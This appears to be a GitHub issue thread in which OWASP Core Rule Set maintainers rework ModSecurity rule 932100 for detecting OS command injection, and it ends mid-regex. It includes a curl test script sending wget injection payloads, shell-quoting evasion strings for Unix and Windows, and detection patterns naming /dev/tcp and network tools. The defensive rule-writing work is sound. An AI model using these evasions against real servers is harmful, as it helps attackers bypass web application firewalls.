Improve System Command Injection rule (932100)

Rule 932100 seems to hit a lot of false positives as well as false negatives. I'll copy some comments from the mailinglist so we can revisit this as necessary. If I missed or represented some comments please add to this issue.

Summary of problems:

false positives due to common words, however some words are essential to attack detection
false negatives due to regexp
false negatives due to missing commands like passwd

Christian said: This rule is controversial for different reasons than the one in the previous post. It was a simple regex in 2.2.X. For 3.0.0 it has been enriched with a data file.

In a response to my blogpost Chaim conceded the 3.0.0 version is still plagued by a lot of false positives. Obviously so, if you look at the commands. After all, unix commands are close to natural English for a good reason.

Now Franziska (collaborating on the paranoia mode) and I wonder if it would not make sense to split os-commands.data into two or more files. The commands with few false positives would remain in the standard file, commands generating lots of false positives could then be moved into os-commands-paranoia.data and be referenced in a separate rule copying the behaviour of the standard rule.

My reaction: I like the idea of splitting the file. Overall I'm not satisfied with this new rule yet. I think the regexp needs some love too. I agree some of the words in os-commands.data seem rather paranoid. Words like "choice", "help", "now” seem of low value and are common in natural text. Also, the large number of Unix-only environments could skip Windows related commands. It’s hard for users to modify these lists as you’d have to hack the CRS, and these huge collections are to maintain anyhow, so I agree we need granularity.

The rule has some regexp magic to prevent false positives, but the balance is not a complete success in my opinion. For instance, the following URLs don't trigger in CRSv3: http://vuln/?cmd=wget%20http://example.com/blah.txt http://vuln/?cmd=sh%20blah.txt

So it's not as strong as you would want either to prevent some common RCE. Something like http://vuln/?cmd=Wget%20http://example.com/;%20ecHo does trigger it.

Christian produced some statistics and a possible resolution:

1 : open
1 : replace
1 : set
1 : sort
1 : type
1 : where
2 : cat
2 : now
2 : sed
2 : tree
2 : which
3 : color
3 : git
3 : head
3 : history
3 : net
5 : diff
5 : format
5 : time
6 : echo
9 : ver
11 : choice
11 : share
15 : for
16 : rm
21 : arch
22 : start
22 : top
24 : ren
27 : local
29 : query
32 : nc
40 : dir
41 : sh
42 : su
45 : sc
56 : cmd

So maybe we face 3 groups of commands:

entries without many FPs -> PL1
entries with many FPs, but not very dangerous -> PL2 or higher
entries with many FPs, but very dangerous -> separate regex rule in PL1 which deals with the FPs

Walter addition: I'm also still interested in splitting off the Windows batch commands to a separate rule. We could tag it platform-windows, this will surely cut down on false positives.

I've started looking at the RCE rule. First, let's describe the current rule. The rule first uses a words file with pmf operator, and in a chain does some regexp magic to ensure magic characters are found.

The chain is aimed at the case of an application sending untrusted input unescaped to a shell as part of another argument (command injection). For instance it will block a payload of pic.jpg;wget ... and pic.jpg|wget .... It seems decent at blocking that, but due to use of the pmf operator, and our being unable to reuse the pmf matches in an expression, the regexp will be heavy-handed. Just the use of a word in the list, in combination with some special characters, and you have a rule hit.

False positives

Franziska and Christian have given some input about false positives, so I've done an experiment on this. I've taken a public dataset of 126k Reddit comments, and fed all of them to CRS3 at paranoia level 1. I assume almost all of these comments should be negatives, although surely some will discuss code or SQL, but that's likely a small part. Here is the distribution of the resulting CRS3 scores:

comments-waf-scores

I posted 126k comments and would hope for almost all of them to return a score 0. That's not the case. Around 81k comments have score 0, 43k comments have score 5, 2k comments have score 10, 211 comments have score 15, 16 comments have score 20, and 9 comments have a higher score. So, around 35% of the posted forum comments yield a false positive result. :(

This is a bit sad, but now comes the good news. Here is the table of the 5 rules producing the most hits for the reddit dataset:

Rule ID	Hits	Explanation
`932100`	44203	Remote Command Execution (RCE) Attempt
`942250`	2142	Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections
`942230`	224	Detects conditional SQL injection attempts
`921110`	126	HTTP Request Smuggling Attack
`921160`	95	HTTP Header Injection Attack via payload (CR/LF and header-name detected)

It turns out that almost all of the rule hits (over 44k) are due to this RCE rule!

That in itself is great news. It means that by improving this rule, we have an amazing potential for reducing the rate of false positives.

But it also means that improving the rule is absolutely a must for 3.0.0. It's a new category of false positives introduced, which was not in CRS2.

False negatives

As for the specificity. I had complained a bit about some uncaught examples like a payload of wget http://foo. I now realize that CRS3 simply does not deal (yet) with the case of a complete parameter passed to a shell directly (no injection into another command string, but a direct RCE vulnerability). The old CRS2 rule (950907) had a regexp so it could do this. The current chain does not deal with this case, probably as it would have made the FP rate even higher.

The os-commands.data file contains 301 words, many of which are commonly found in English texts, like: bash call cat copy del dir echo exec head history kill less lynx more net type... The situation is really different than with the PHP function names. Many shell commands are short and common. Some of these words are actually important to block however. Especially the Windows shell has a lot of normal English words as commands.

The command id is often used for reconnaissance, but is currently not included in the data file. That was probably done because of false positives, but it's a shame since this is often used by scanners. If we make our detection more precise, maybe we can bring it back.

The case of a matched string at the start of the payload might also require more attention. It's debatable if we want to block a payload like ^cat .... So maybe we should be somewhat more restrictive in the case of a match at the start of the string. Blocking wget ... or sh ... is more defensible. In any case, this must be covered with tests carefully.

The top priority is to drastically lower FP (ideally by 90% or more), but at the same time I hope to catch more injections and if possible some direct RCE.

Possible strategies

Partition the data file into "must have" terms for PL1, "nice to have" terms for PL2, and "unimportant/hopeless".
Ensure that a word is only matched if it appears in a dangerous position: at the start of the payload, or after a command separator like ; and |. This would use an approach like in CRS2 950907 possibly updated with the current chain regexp.
Separate the Windows shell commands into a separate rule, tagged with platform-windows. It is my estimation that this will remove 50% or more of FP on Unix systems.
For Unix commands, use case-sensitive match. cat is a command but Cat should not match. This could certainly lower FP, since in natural text, caps are commonly used at the start of payloads or after a separator character.
Consider if we can include id in a list without too much FP. If not, then at least add /usr/bin/id.
Ensure that we also accept commands prefixed with a path (e.g. /bin/sh, C:\Windows\system32\cmd.exe)
If significant FP remains from words at the start of the payload, restrict the list of words checked at the start of a payload.

I'll sleep on it, but I think going back to a regexp is pretty much a must, since it would enable a lot of strategies, and I don't have too much hope for just partitioning the word files. With a pmf rule, I'm afraid you still can't post a regular internet comment using CRS.

The surgical precision of a regexp might allow us to include even 300 terms with reasonably small FP. Maybe we can get to a good FP rate with just one rule, if the regexp is precise enough. If this is not satisfactory, it's not much more work to partition the items and send the lesser important ones to PL2 or higher.

I wouldn't mind splitting off the Windows words either as it would benefit my situation. I expect a lot of FP will always come from these words. If Unix users can disable that rule in their configs, their security won't be impacted. If we don't split for OS, they don't have that control, and many of them may then remove the whole list.

Wow. This is nice. My data confirms that most FPs left in CRS3 PL1 are due to this rule. I am glad you are tackling it.

Where did you get that 126K reddit file from? Mind sharing it? I have meanwhile found https://www.reddit.com/r/datasets/comments/3bxlg7/i_have_every_publicly_available_reddit_comment/ which seems like an ultimate answer to my regular "we-need-a-dataset-of-vanilla-traffic-to-calibrate-the-ruleset" remark.

I agree with your conclusion we need to go back to a regex. Your handling of the PHP function calls has proven that we can live with the performance and that we have a transparent and repeatable way of generating the regexes. I'd rather not include the less dangerous terms in the PL1 rule. For reasons of performance (why burn cycles in default install on something we consider mostly harmless) and complexity.

Possible strategies: 1 : Agreed. I would not mind run up to PL 3 and 4 with the rules. As mentioned elsewhere, we have a few dozens of PL2 rules, but little in PL3 and 4. Also: Maybe we want to have the same list of commands in multiple rules. A relaxed regex at lower PL and a stricter one at a higher PL. 2 : Yep 3 : I do not like separation by OS or by application for the simple reason that big services / enterprises do not know the backends very well and might disable certain categories (or if default-off: forget to enable). Can you give a few examples of payloads targeting windows commands? However, your claim that windows commands lead to a ton of Unix FPs is probably stronger than my argument. Working with the cleaned up tags makes it fairly simple. So I agree. 4 : I'd hate to do case sensitive match and the backend uses lowercase before it attempts to execute the code. Be careful here. OR use an additional case insensitive rule at a higher PL. See (1). 5: id is hard. \b word boundaries in regexes might come to our rescue, though. 6: Yes. Can we hardcode these? Or at least hardcode the static ones and use regexes for /usr/local/bin/anything and /opt/anything/bin? 7: I do not understand this. Please elaborate.

@dune73 Thanks for your comments!

I found the dataset via the same thread I think. I didn't feel like filling up my disk so I picked this sample set of just Oct 2007 instead. It's nice in JSON, just skip all comments with body [deleted].

I think realistically we'll likely end up using multiple paranoia levels, perhaps even up to PL4. For maintenance reasons, I strongly prefer not setting up a large collection of rules just for this exploit class. But the FP rate of CRS3 probably requires something somewhat complex. Not sure if we'll need multiple versions of the regexp. Hopefully not... but we could do it.
Yep. See below for some thoughts on possible patterns to detect.
Well, the only thing we need to do is create separate rule(s) for Windows commands. If the user does not care about platforms, there is no harm. Both Unix and Windows rules will execute by default. But the platform separation is an automatic safety valve. If a Unix user gets annoyed by Windows FP, and they whitelist a Windows rule id, its sibling Unix rule is still kicking. User stays protected. Some examples of some Windows-only commands: cmd, compact, copy, del, dir, erase, explorer, format... Another aspect is that the Windows and Unix shell have separate semantics (case sensitivity) or escaping which we might exploit to lower FP. But treating Windows commands separately might double the number of rules to maintain, which is obviously a negative.
I'd prefer not doing a case sensitive match, but if FP remains high and we can push it down, I'm open to the idea. I think the case of an application doing a lowercase transform on the shell string is probably rare, but it'd be nice of us to catch it, at the cost of a bit more maintenance. If we go this route, the case-insensitive sibling sounds like a good addition for PL2 or PL3, depending on FP rate.
I also found that in the past some very short terms have been removed from the list. If id and friends are untenable in the base level words, we could scoop some of them up at a higher paranoia level, perhaps PL3-4.
Could be a regexp, hopefully reasonably simple. I'll paste what I've already thought about at the bottom, but I'll dig into it deeper in the coming weeks. If you have experience with OS command injection, especially on Windows, please add to it.
I meant, if there is still too much FP at the end of this project, we can verify in which parts of the strings the FPs are occurring. Blocking a substring like && cat index.php is quite different than blocking Cat Index Of Australia. So, it could be an option to reduce FP by treating the latter case differently. Maybe by restricting its word list, or as a last resort measure, maybe by checking this case in a higher paranoia level only.

Haha! Following your initial post, I searched around and ended up with the sample set of just Oct 2007. [deleted] looks like a false positive we should tackle separately.

But this all makes a lot of sense.

Pattern ideas

I guess \bwget\b is our friend. Ideally in combination with t:cmdLine . The problem is this transformation removes backslashes which means we would end up with foobarwget and \bwget\b thus no longer matching. Without the transformation, I do not see how we could catch the last two of your examples.

@dune73 Wow, t:cmdLine sounds great! I wonder why it's not implemented in rule 932100 right now. I hope it cures some evasions :) Definitely going to try it.

I did some testing. It seem that \bwget\b combined with t:lowercase, t:cmdLine and multimatch does the trick.

Here is my slightely aggrevated test attack script:

curl --silent -o /dev/null -w "%{http_code}\n" -d "a=^wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=; wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=| wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=&& wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=|| wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\r\n wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\`wget ...\`" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\$(wget ...)" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a='wget'" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\"wget\"" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=/usr/bin/wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=/usr/./bin/wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=C:\Bin\wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\\Foo\bar\wget" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=wget.exe" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=wget/h" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=WgEt" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\w\g\e\t" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a='w'\"g\"et" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\"w\"\g\e\t" http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a='w'\"g\"\e\t"  http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=/usr/bin/\'w'\"g\"\e\t"  http://localhost/index.html
curl --silent -o /dev/null -w "%{http_code}\n" -d "a=\\Foo\bar\'w'\"g\"\e\t"  http://localhost/index.html

The payloads, "w"\g\e\t and 'w'"g"\e\t" are actually functional in linux. Paste them into the shell: wget is executed.

The following rule catches all of the above but last one:

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bwget\b" \
        "msg:'Remote Command Execution (RCE) Attempt',\
        phase:request,\
        rev:'2',\
        ver:'OWASP_CRS/3.0.0',\
        maturity:'9',\
        accuracy:'8',\
        capture,\
        t:lowercase,\
        t:cmdLine,\
        multimatch,\
        ctl:auditLogParts=+E,\
        deny,\
        id:1000,\
        tag:'application-multi',\
        tag:'language-multi',\
        tag:'platform-multi',\
        tag:'attack-rce',\
        tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
        tag:'WASCTC/WASC-31',\
        tag:'OWASP_TOP_10/A1',\
        tag:'PCI/6.5.2',\
        logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
        severity:'CRITICAL'"

Without multimatch, two additional ones of them slip through; as expected line 13 and 14.

The problem with the last one is the combination of quotes and backslash characters. t:cmdLine erases both of them, but we end up with foobarwget and \bwget\b no longer matches as explained above.

That's an important observation. Indeed it would allow Windows attackers to pass C:\Windows\System32\cmd.exe, which t:cmdLine would transform to C:WindowsSystem32cmd.exe and so it goes undetected.

At the same time, the Windows shell is also sensitive to evasions via quotes. For instance, "c"md works in Windows too. To prevent this evasion we would still need t:cmdLine.

We might work around this particular Windows case of C:\Windows\System32\cmd.exe (and \\unc\paths) by regexping on its form specifically. This might not catch all, and might raise FP.

If we separate Unix and Windows command lists, we could add a trick for Windows only.

I've checked out the existing os-commands.data file, and added some 2-letter commands and some missing Unix commands. I've looked up the words in a dictionary and marked some for high FP risk already.

There are 448 entries (261 Unix, 268 Windows).

os-commands.csv.txt

Yes, it's very important to catch this.

I looked through the transformations once more and realised that t:normalizePathWin does an implicit \ to / conversion. This means that \\foo\bar\'w'\"g\"\e\t ends up as /foo/bar/'w'"g"/e/t. If we then apply t:cmdLine w get /foo/var/wg/e/t. This is not particularly fancy, but we can catch it with optional slashes in the regex:

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bw\/?g\/?e\/?t\b" \
        "msg:'Remote Command Execution (RCE) Attempt',\
        phase:request,\
        rev:'2',\
        ver:'OWASP_CRS/3.0.0',\
        maturity:'9',\
        accuracy:'8',\
        capture,\
        t:lowercase,\
        t:normalizePathWin,\
        t:cmdLine,\
        multimatch,\
        ctl:auditLogParts=+E,\
        deny,\
        id:1000,\
        tag:'application-multi',\
        tag:'language-multi',\
        tag:'platform-multi',\
        tag:'attack-rce',\
        tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
        tag:'WASCTC/WASC-31',\
        tag:'OWASP_TOP_10/A1',\
        tag:'PCI/6.5.2',\
        logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
        severity:'CRITICAL'"

This rule now catches all the payloads in the series of curl calls above. Have not checked FPs so far, but I do not expect too many as forward slashes within words are rare AFAICS. Performance suffers of course, but multimatch is probably worse. The t:normalizePathWin transformation seems to be a bit cheaper than t:cmdLine. What is really annoying is the bad readability of the regex.

I have noted that t:multimatch is no longer necessary to catch all these evasions. Not sure if we can remove it generally or of there are situations, where we would still need it. Has to be tested.

Let's try and cover this as well. https://www.dropbox.com/s/om4yttb6nfix2hk/BSidesAth16_Perform_Effective_Command_Injection_Attacks_Like_Mr.Robot_Final.pdf He has a special slide on circumventing ModSec.

@dune73 Cool! This past week was super hectic, but I'm going to work on the rule today. I'll have a look at the presentation :)

Read it. Very inspiring work! I had heard of commix, but didn't know that it was the sqlmap for command injections. I've never considered this attack much (executing shells is for those without LSM and jails...) but there's a whole world out there. I've also read a bit more about bash and PowerShell and I installed a Windows VM. It's bad, it's bad. Did you know that in Windows you can do ^w^g^e^t? Did you know PowerShell added lots of aliases for Unix commands so that cp and rm also work? This is not helping, people.

With this depressing knowledge, I've expanded the patterns and os-commands data, and also thought about some other heuristics to add as possible rules. The whole cmd injection field is starting to look a bit like SQLi or XSS. We will end up with a suite of rules. I'm sure we won't detect everything under the sun. But we can try :)

Patterns

# command at start of payload (direct RCE)
wget ...

# markers that could precede a command in the middle of a string (command injection)
# we must watch out for \s* between marker and command
; wget ...
| wget ...
{ wget ... }      # Unix shell function
& wget ...        # Windows equivalent of ;
&& wget ...
|| wget ...
\n wget ...
$( wget ...)      # command substitution
$(( wget ...))    # command substitution
` wget ... `      # command substitution (probably sensitive to FP)
${wget ...}       # parameter expansion
<(wget ...)       # process substitution
>(wget ...)       # process substitution

# quoting and other command prefixes 
(wget ...)        # Unix
'wget ...'        # Unix/Windows
"wget ..."
/usr/bin/wget     # prefixed with path
/usr/./bin/wget   # path normalization
C:\Bin\wget       # Windows path (watch out for t:cmdLine!)
\\Foo\bar\wget    # Windows UNC path (watch out for t:cmdLine!)
FOO=1 wget        # setting variables

# postfix (probably okay by default if we use \b)
wget.exe          # Windows extension, also .com,.vbs
wget/h            # Windows switches can come straight after the command

# evasions
WgEt ...          # Windows is case-insensitive
\w\g\e\t ...      # Unix literal characters
^w^g^e^t ...      # Windows literal characters
'w'"g"et ...      # Unix string evasion
"w"get ...        # Windows string evasion

Separate rule ideas

Shell expansion: We could use a separate rule to detect shell expansions which may be present in command injection. This will allow us to catch them even if we miss the command.

$(...)       # command substitution
$((...))     # arithmetic expansion
${...}       # parameter expansion
<(...)       # process substitution
>(...)       # process substitution
`...`        # command substitution (FP risk)

Powershell options: Detect strings like: -EncodedCommand -ExecutionPolicy -InputFormat -NonInteractive -OutputFormat -PSConsoleFile. Some strings more FP-prone: -Command -File. Case insensitive.

Powershell cmdlets: Detect cmdlets available in Windows PowerShell. As always, case insensitive. Easy catch, most of them look resistant to FP, we can throw out some who are.

/dev: Detect /dev/fd/X, /dev/std{in|out|err}, /dev/tcp/host/port, /dev/udp/host/port. Just like PHP stream wrappers, they can be used to transfer code out-of-band, leak data, send spam, etc.

Time based attacks: Detect Unix sleep \d+, Windows Start-Sleep (case insensitive). Could lead to FP.

Check headers: We might want to inspect some request headers like user-agent, referrer, host too.

os-commands.csv.txt

I made a proof of concept for the main rule without transformations. I wanted to have the coverage of the possible execution vectors, paths, prefixes etc out of the way. This example rule just detects wget, but that part can be replaced with an automatically assembled regexp. It detects Windows and Unix paths in one rule for now.

Dealing with shell quoting evasions (\w\g\e\t, ^w^g^e^t, "w"g'et') in a regexp is brutal. It will make it the most horrible regexp ever seen.

Maybe it can be simplified in some way. t:normalisePath gave me very strange results depending on other unrelated parts of the payload, so I'm scared of it. If t:cmdLine would correctly normalize all possible shell characters then that could be used to minimize those [\\\\'\"\^] sequences in the regexp. But if we have to match for \ and ^ between command letters anyway, we might as well skip t:cmdLine and have all the character handling in one place.

I don't know if we'll hit limits in ModSecurity's regexp engine when assembling the data files into the regexp, because if we are going to deal with these character evasions, the full regexp might get pretty \l\a\r\g\e...

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(^|;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\()\s*({|\(|[\w\d_]+=.*)*\s*('|\")*([\w\d'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w\d '\"/\\\\]*\\\\)?['\"]*[\\\\'\"\^]?w[\\\\'\"\^]{0,2}g[\\\\'\"\^]{0,2}e[\\\\'\"\^]{0,2}t\b" \
    "msg:'Remote Command Execution (RCE) Attempt',\
    phase:request,\
    rev:'3',\
    ver:'OWASP_CRS/3.0.0',\
    maturity:'9',\
    accuracy:'8',\
    capture,\
    t:none,\
    ctl:auditLogParts=+E,\
    block,\
    id:932100,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-rce',\
    tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
    tag:'WASCTC/WASC-31',\
    tag:'OWASP_TOP_10/A1',\
    tag:'PCI/6.5.2',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    severity:'CRITICAL',\
    setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.rce_score=+%{tx.critical_anomaly_score},\
    setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\
    setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RCE-%{matched_var_name}=%{tx.0}"

Reviews welcome. The regexp is based on catching the patterns in the comment above.

(Edit: removed very long test output from this post, see os-commands.txt for updated testcases.)

I think you can expect a letter from the International Academy of Regex Wizadry during the week. This is most impressive. Let alone the results.

I've pasted the assembled regexps into a Windows and a Unix rule.

To keep the regexp as small as possible, I've excluded Windows escape characters from the Unix rule, and vice versa.

# Unix commands
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\()\s*(?:{|\(|[\w\d_]+=.*)*\s*(?:'|\")*(?:[\w\d'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w\d '\"/\\\\]*\\\\)?['\"]*[\\\\'\"\^]?(?:l[\\\\'\"]{0,2}(?:s(?:[\\\\'\"]{0,2}(?:b[\\\\'\"]{0,2}_[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}a[\\\\'\"]{0,2}s[\\\\'\"]{0,2}e|c[\\\\'\"]{0,2}p[\\\\'\"]{0,2}u|m[\\\\'\"]{0,2}o[\\\\'\"]{0,2}d|p[\\\\'\"]{0,2}c[\\\\'\"]{0,2}i|u[\\\\'\"]{0,2}s[\\\\'\"]{0,2}b|o[\\\\'\"]{0,2}f))?|z[\\\\'\"]{0,2}(?:(?:[ef][\\\\'\"]{0,2})?g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p|c[\\\\'\"]{0,2}(?:a[\\\\'\"]{0,2}t|m[\\\\'\"]{0,2}p)|m[\\\\'\"]{0,2}(?:o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e|a)|d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s)|e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s(?:[\\\\'\"]{0,2}(?:(?:f[\\\\'\"]{0,2}i[\\\\'\"]{0,2}l|p[\\\\'\"]{0,2}i[\\\\'\"]{0,2}p)[\\\\'\"]{0,2}e|e[\\\\'\"]{0,2}c[\\\\'\"]{0,2}h[\\\\'\"]{0,2}o))?|a[\\\\'\"]{0,2}s[\\\\'\"]{0,2}t(?:[\\\\'\"]{0,2}(?:l[\\\\'\"]{0,2}o[\\\\'\"]{0,2}g(?:[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n)?|c[\\\\'\"]{0,2}o[\\\\'\"]{0,2}m[\\\\'\"]{0,2}m))?|w[\\\\'\"]{0,2}p(?:[\\\\'\"]{0,2}-[\\\\'\"]{0,2}d[\\\\'\"]{0,2}o[\\\\'\"]{0,2}w[\\\\'\"]{0,2}n[\\\\'\"]{0,2}l[\\\\'\"]{0,2}o[\\\\'\"]{0,2}a[\\\\'\"]{0,2}d)?|o[\\\\'\"]{0,2}(?:g[\\\\'\"]{0,2}n[\\\\'\"]{0,2}a[\\\\'\"]{0,2}m[\\\\'\"]{0,2}e|c[\\\\'\"]{0,2}a[\\\\'\"]{0,2}(?:t[\\\\'\"]{0,2}e|l))|f[\\\\'\"]{0,2}t[\\\\'\"]{0,2}p(?:[\\\\'\"]{0,2}g[\\\\'\"]{0,2}e[\\\\'\"]{0,2}t)?|y[\\\\'\"]{0,2}n[\\\\'\"]{0,2}x|p)|p[\\\\'\"]{0,2}(?:k[\\\\'\"]{0,2}(?:g(?:(?:[\\\\'\"]{0,2}_)?[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}f[\\\\'\"]{0,2}o)?|e[\\\\'\"]{0,2}x[\\\\'\"]{0,2}e[\\\\'\"]{0,2}c|i[\\\\'\"]{0,2}l[\\\\'\"]{0,2}l)|t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}r(?:[\\\\'\"]{0,2}(?:d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p))?|(?:a[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s[\\\\'\"]{0,2}w|u[\\\\'\"]{0,2}s[\\\\'\"]{0,2}h|o[\\\\'\"]{0,2}p)[\\\\'\"]{0,2}d|y[\\\\'\"]{0,2}t[\\\\'\"]{0,2}h[\\\\'\"]{0,2}o[\\\\'\"]{0,2}n(?:[\\\\'\"]{0,2}(?:3(?:[\\\\'\"]{0,2}m)?|2))?|e[\\\\'\"]{0,2}r[\\\\'\"]{0,2}(?:l(?:[\\\\'\"]{0,2}(?:s[\\\\'\"]{0,2}h|5))?|m[\\\\'\"]{0,2}s)|r[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e[\\\\'\"]{0,2}n[\\\\'\"]{0,2}v|(?:g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e|f[\\\\'\"]{0,2}t)[\\\\'\"]{0,2}p|h[\\\\'\"]{0,2}p(?:[\\\\'\"]{0,2}[57])?|i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}g|s)|n[\\\\'\"]{0,2}(?:c(?:[\\\\'\"]{0,2}(?:\.[\\\\'\"]{0,2}(?:t[\\\\'\"]{0,2}r[\\\\'\"]{0,2}a[\\\\'\"]{0,2}d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}t[\\\\'\"]{0,2}i[\\\\'\"]{0,2}o[\\\\'\"]{0,2}n[\\\\'\"]{0,2}a[\\\\'\"]{0,2}l|o[\\\\'\"]{0,2}p[\\\\'\"]{0,2}e[\\\\'\"]{0,2}n[\\\\'\"]{0,2}b[\\\\'\"]{0,2}s[\\\\'\"]{0,2}d)|a[\\\\'\"]{0,2}t))?|e[\\\\'\"]{0,2}t(?:[\\\\'\"]{0,2}(?:k[\\\\'\"]{0,2}i[\\\\'\"]{0,2}t[\\\\'\"]{0,2}-[\\\\'\"]{0,2}f[\\\\'\"]{0,2}t[\\\\'\"]{0,2}p|(?:s[\\\\'\"]{0,2}t|c)[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t))?|s[\\\\'\"]{0,2}(?:l[\\\\'\"]{0,2}o[\\\\'\"]{0,2}o[\\\\'\"]{0,2}k[\\\\'\"]{0,2}u[\\\\'\"]{0,2}p|t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t)|(?:o[\\\\'\"]{0,2}h[\\\\'\"]{0,2}u|m[\\\\'\"]{0,2}a)[\\\\'\"]{0,2}p|p[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}g|a[\\\\'\"]{0,2}n[\\\\'\"]{0,2}o|i[\\\\'\"]{0,2}c[\\\\'\"]{0,2}e)|s[\\\\'\"]{0,2}(?:h(?:[\\\\'\"]{0,2}(?:\.[\\\\'\"]{0,2}d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}s[\\\\'\"]{0,2}t[\\\\'\"]{0,2}r[\\\\'\"]{0,2}i[\\\\'\"]{0,2}b|u[\\\\'\"]{0,2}t[\\\\'\"]{0,2}d[\\\\'\"]{0,2}o[\\\\'\"]{0,2}w[\\\\'\"]{0,2}n|i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}t))?|e[\\\\'\"]{0,2}(?:n[\\\\'\"]{0,2}d[\\\\'\"]{0,2}m[\\\\'\"]{0,2}a[\\\\'\"]{0,2}i[\\\\'\"]{0,2}l|t(?:[\\\\'\"]{0,2}e[\\\\'\"]{0,2}n[\\\\'\"]{0,2}v)?|d)|t[\\\\'\"]{0,2}r[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}g[\\\\'\"]{0,2}s|(?:l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}e|f[\\\\'\"]{0,2}t|c)[\\\\'\"]{0,2}p|y[\\\\'\"]{0,2}s[\\\\'\"]{0,2}c[\\\\'\"]{0,2}t[\\\\'\"]{0,2}l|o[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}a|r)[\\\\'\"]{0,2}t|d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|u(?:[\\\\'\"]{0,2}d[\\\\'\"]{0,2}o)?|s[\\\\'\"]{0,2}h|v[\\\\'\"]{0,2}n)|t[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}(?:p[\\\\'\"]{0,2}(?:t[\\\\'\"]{0,2}r[\\\\'\"]{0,2}a[\\\\'\"]{0,2}c[\\\\'\"]{0,2}e[\\\\'\"]{0,2}r[\\\\'\"]{0,2}o[\\\\'\"]{0,2}u[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e|i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}g)|s[\